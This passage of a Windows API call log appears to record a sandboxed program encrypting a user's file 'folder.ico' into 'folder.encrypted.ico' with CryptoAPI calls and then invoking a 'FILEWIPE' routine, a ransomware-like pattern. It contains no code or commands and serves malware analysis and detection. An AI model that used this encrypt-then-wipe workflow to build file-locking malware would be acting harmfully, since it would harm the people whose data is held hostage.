hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.662] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.662] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.encrypted.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.encrypted.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0036.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.663] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.664] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x74e6, lpOverlapped=0x0) returned 1 [0036.666] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74e6) returned 0x955018 [0036.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74e6) returned 0x95c508 [0036.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.668] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0036.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0036.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0036.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74e6) returned 0x955018 [0036.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0036.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0036.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74e6) returned 0x9639f8 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.670] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da368 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.671] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.672] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da328, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da328*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.672] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.672] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.672] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x74e6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x74f0) returned 1 [0036.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.673] CharLowerBuffW (in: lpsz="byte[29937]", cchLength=0xb | out: lpsz="byte[29937]") returned 0xb [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.673] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.673] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x96aee8*, pdwDataLen=0x6ae220*=0x74e6, dwBufLen=0x74f0 | out: pbData=0x96aee8*, pdwDataLen=0x6ae220*=0x74f0) returned 1 [0036.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0036.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.674] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.676] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.677] CryptDestroyKey (hKey=0x7c2280) returned 1 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.677] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.677] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.677] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0036.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.678] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0036.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.678] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.678] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.679] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.680] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.680] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.680] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.680] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="folder.ico", cAlternateFileName="")) returned 0x7c2240 [0036.680] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.680] PeekMessageW 